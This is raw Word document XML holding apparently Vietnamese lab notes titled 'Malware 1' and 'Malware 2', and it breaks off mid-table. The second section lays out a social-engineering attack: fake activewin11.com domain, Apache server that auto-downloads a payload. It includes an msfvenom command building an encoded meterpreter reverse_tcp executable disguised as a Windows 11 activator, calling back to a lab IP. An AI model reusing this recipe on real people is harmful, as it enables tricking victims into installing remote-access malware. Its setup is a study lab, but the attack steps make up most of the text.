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16D98" w14:textId="194ABD6B" w:rsidR="00AD2323" w:rsidRDefault="00DB2752" w:rsidP="00DB2752">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C21EB5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Malware 1 – Khai thác điểm yếu của người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0820C" w14:textId="083C83FE" w:rsidR="00DB2752" w:rsidRDefault="00DB2752" w:rsidP="00DB2752">
      <w:r>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:r w:rsidR="00C505CB">
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00C505CB" w:rsidRPr="0038488E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=S8fZpwBDkGY</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C491965" w14:textId="3F7D3332" w:rsidR="00C505CB" w:rsidRDefault="00C505CB" w:rsidP="00C505CB">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0038488E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=F7ZyerLyTbY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788ADE9A" w14:textId="6BC42FF1" w:rsidR="00C505CB" w:rsidRDefault="00C505CB" w:rsidP="00C505CB">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0038488E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=_sBenYYr0-s</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (dấu file trên windown</w:t>
      </w:r>
      <w:r w:rsidR="009D5B32">
        <w:t xml:space="preserve"> trong 5s</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E830BF" w14:textId="2A3E0068" w:rsidR="00DB2752" w:rsidRDefault="00DB2752" w:rsidP="00DB2752">
      <w:r>
        <w:t>Tóm tắt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B942074" w14:textId="5CADF2C2" w:rsidR="00B00EEB" w:rsidRDefault="00B00EEB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846D68B" w14:textId="4BD6F091" w:rsidR="00B00EEB" w:rsidRDefault="00B00EEB" w:rsidP="00B00EEB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C21EB5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malware 2 – Khai thác lỗ hổng Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AFE24" w14:textId="594A1CF9" w:rsidR="00B00EEB" w:rsidRDefault="00B00EEB" w:rsidP="00DB2752">
      <w:r>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidR="00D24FBA">
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D24FBA" w:rsidRPr="0038488E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=S8fZpwBDkGY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B4984">
        <w:t xml:space="preserve">(Dùng Payload </w:t>
      </w:r>
      <w:r w:rsidR="009B4984">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="009B4984">
        <w:t xml:space="preserve"> Xài video này</w:t>
      </w:r>
      <w:r w:rsidR="00D75845">
        <w:t xml:space="preserve"> cho bên dưới</w:t>
      </w:r>
      <w:r w:rsidR="009B4984">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63950DE2" w14:textId="34BF5FE7" w:rsidR="00B00EEB" w:rsidRDefault="00D24FBA" w:rsidP="00DB2752">
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0038488E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=F7ZyerLyTbY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B4984">
        <w:t>(dùng shetter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591E91C6" w14:textId="15F2DE11" w:rsidR="00B00EEB" w:rsidRDefault="00687B51" w:rsidP="00DB2752">
      <w:r>
        <w:t>Máy: Kali – Win</w:t>
      </w:r>
      <w:r w:rsidR="00234FD5">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14402821" w14:textId="122A1C95" w:rsidR="001C2B01" w:rsidRDefault="001C2B01" w:rsidP="00DB2752">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản: mình là người bán máy, và mình sẽ là dô máy nạn nhân để đặt domain của IP_Kali là </w:t>
      </w:r>
      <w:r w:rsidRPr="001C2B01">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>activewin11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidR="00C21EB5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C21EB5" w:rsidRPr="00C21EB5">
        <w:t>để khi người dùng mún activewin11 thì sẽ truy cập vào link mik tạo sẵn là activewin11.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A5084" w14:textId="17C62256" w:rsidR="0074134D" w:rsidRDefault="0074134D" w:rsidP="00DB2752">
      <w:r>
        <w:t>Content chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135666FF" w14:textId="7E1A642C" w:rsidR="0074134D" w:rsidRDefault="0074134D" w:rsidP="00DB2752">
      <w:r>
        <w:tab/>
        <w:t>+ Tạo ra file active-window11.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71328314" w14:textId="2C6F4E68" w:rsidR="0074134D" w:rsidRPr="0074134D" w:rsidRDefault="0074134D" w:rsidP="00DB2752">
      <w:r>
        <w:tab/>
        <w:t>+ Cấu hình sao cho mỗi khi truy cập apache thông qua domain thì tự động tải xuống</w:t>
      </w:r>
      <w:r w:rsidR="00A81145">
        <w:t xml:space="preserve"> mã độc</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10727" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7031"/>
        <w:gridCol w:w="3696"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A81145" w14:paraId="1D707390" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10727" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7296C780" w14:textId="008D190F" w:rsidR="00D80A00" w:rsidRDefault="00D80A00" w:rsidP="00D80A00">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>KALI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="67A4F561" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0E0ABD" w14:textId="00215CEA" w:rsidR="00D80A00" w:rsidRDefault="00EC58CF" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF62DDD" wp14:editId="6806F287">
                  <wp:extent cx="2286000" cy="355904"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="82290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06329" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2315417" cy="360484"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBEF409" w14:textId="77777777" w:rsidR="00D80A00" w:rsidRDefault="00D80A00" w:rsidP="00DB2752"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="633C4AF4" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E666AAC" w14:textId="3934002D" w:rsidR="00D80A00" w:rsidRDefault="00B904AE" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00B904AE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF7889B" wp14:editId="641C9C5D">
                  <wp:extent cx="1681480" cy="495055"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635"/>
                  <wp:docPr id="182372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26819" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1684488" cy="495941"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A17198E" w14:textId="77777777" w:rsidR="00D80A00" w:rsidRDefault="00D80A00" w:rsidP="00DB2752"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="01126648" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B2B80C4" w14:textId="1B23C49D" w:rsidR="00EC58CF" w:rsidRPr="00B904AE" w:rsidRDefault="00EC58CF" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463A74CE" wp14:editId="7C434FCD">
                  <wp:extent cx="2743200" cy="482657"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="214025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54966" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2757831" cy="485231"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF7BCC9" w14:textId="77777777" w:rsidR="00EC58CF" w:rsidRDefault="00EC58CF" w:rsidP="00DB2752"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="3EAAB52E" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B1461E9" w14:textId="57856C1A" w:rsidR="00D80A00" w:rsidRDefault="00B904AE" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00B904AE">
              <w:t>msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B904AE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>192.168.182.128</w:t>
            </w:r>
            <w:r w:rsidRPr="00B904AE">
              <w:t xml:space="preserve"> LPORT=8080 -e x86/shikata_ga_nai -f exe -o </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00EC58CF" w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>home/kali</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/Desktop/</w:t>
            </w:r>
            <w:r w:rsidRPr="00B904AE">
              <w:t>active-window11.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CBA710D" w14:textId="77777777" w:rsidR="00D80A00" w:rsidRDefault="00EC58CF" w:rsidP="00DB2752">
            <w:r>
              <w:t>Đẻ ra:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FCF75D" w14:textId="32BE7780" w:rsidR="00EC58CF" w:rsidRDefault="00EC58CF" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00EC58CF">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FFB363A" wp14:editId="3321C96E">
                  <wp:extent cx="767080" cy="655505"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="95751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17633" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="771150" cy="658983"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="5E704002" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61178AEF" w14:textId="77777777" w:rsidR="00D80A00" w:rsidRDefault="005048F4" w:rsidP="00DB2752">
            <w:r>
              <w:t>- apt update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="439DF535" w14:textId="77777777" w:rsidR="005048F4" w:rsidRDefault="005048F4" w:rsidP="00DB2752">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="005048F4">
              <w:t>apt install apache2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E62650C" w14:textId="77777777" w:rsidR="001C2B01" w:rsidRDefault="001C2B01" w:rsidP="00DB2752">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="001C2B01">
              <w:t>systemctl start apache2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F56C12" w14:textId="7134B1D7" w:rsidR="001C2B01" w:rsidRDefault="001C2B01" w:rsidP="00DB2752">
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="001C2B01">
              <w:t>systemctl status apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233FB785" w14:textId="731DBB1E" w:rsidR="00D80A00" w:rsidRDefault="005048F4" w:rsidP="00DB2752">
            <w:r>
              <w:t>Cài apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="1248A2DE" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13546CA3" w14:textId="6E8F0135" w:rsidR="00D80A00" w:rsidRDefault="001C2B01" w:rsidP="00DB2752">
            <w:r w:rsidRPr="001C2B01">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2E307B" wp14:editId="1C7DA0F6">
                  <wp:extent cx="2414998" cy="274320"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                  <wp:docPr id="194670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01724" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2421701" cy="275081"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D86FE0" w14:textId="6547FFCF" w:rsidR="00D80A00" w:rsidRDefault="001C2B01" w:rsidP="00DB2752">
            <w:r>
              <w:t xml:space="preserve">Chèn file active-window11.exe vào trang web html mặc định của apache2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="2DBA90AB" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079CE4DC" w14:textId="473B919D" w:rsidR="00D80A00" w:rsidRDefault="003A533C" w:rsidP="00DB2752">
            <w:r w:rsidRPr="003A533C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="534E01BC" wp14:editId="72A570FF">
                  <wp:extent cx="2486372" cy="314369"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="98168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81223" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2486372" cy="314369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290486F8" w14:textId="40222BDD" w:rsidR="00D80A00" w:rsidRDefault="003A533C" w:rsidP="00DB2752">
            <w:r>
              <w:t>Đặt domain cho IP_Kali bên máy Win</w:t>
            </w:r>
            <w:r w:rsidR="00234FD5">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="362EC32D" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181372CC" w14:textId="65145E2E" w:rsidR="00A849B2" w:rsidRPr="003A533C" w:rsidRDefault="00A849B2" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00A849B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="596DEA2B" wp14:editId="55A135D5">
                  <wp:extent cx="2339788" cy="330755"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="204033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38025" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2386662" cy="337381"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D27AD43" w14:textId="549777F5" w:rsidR="00A849B2" w:rsidRDefault="00A849B2" w:rsidP="00DB2752">
            <w:r>
              <w:t>Kích hoat headers trong kali lên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="3977533E" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694CA8EA" w14:textId="1C946D71" w:rsidR="00D80A00" w:rsidRDefault="00A81145" w:rsidP="00DB2752">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053753A8" wp14:editId="3736C599">
                  <wp:extent cx="3457448" cy="2568389"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="80215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55586" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3485473" cy="2589208"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF90D12" w14:textId="578796B9" w:rsidR="00D80A00" w:rsidRDefault="00A81145" w:rsidP="00DB2752">
            <w:r>
              <w:t>Thêm vô</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="65F9B886" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FF11ED4" w14:textId="013C8265" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="008B046F" w:rsidP="008B046F">
            <w:r w:rsidRPr="002E2F8E">
              <w:lastRenderedPageBreak/>
              <w:t>systemctl restart apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103896B1" w14:textId="64ACAD59" w:rsidR="008B046F" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r>
              <w:t>Reset lại apache2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="59A16C83" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3828DDAC" w14:textId="70293AC6" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C0A4CE" wp14:editId="117F72BE">
                  <wp:extent cx="2429214" cy="371527"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="117136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61750" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2429214" cy="371527"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CCE608" w14:textId="77777777" w:rsidR="008B046F" w:rsidRDefault="008B046F" w:rsidP="008B046F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="63BA2C39" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20CCD2DB" w14:textId="29EF271B" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56BBF453" wp14:editId="556DD9BC">
                  <wp:extent cx="3863788" cy="1782577"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
                  <wp:docPr id="101185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52157" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3881912" cy="1790939"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC1D94C" w14:textId="77777777" w:rsidR="008B046F" w:rsidRDefault="008B046F" w:rsidP="008B046F"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B4984" w14:paraId="1CD49FA4" w14:textId="77777777" w:rsidTr="009B4984">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7031" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="783F6B08" w14:textId="41E85C91" w:rsidR="008B046F" w:rsidRPr="002E2F8E" w:rsidRDefault="00A81145" w:rsidP="008B046F">
            <w:r w:rsidRPr="00A81145">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A3401B8" wp14:editId="0832978F">
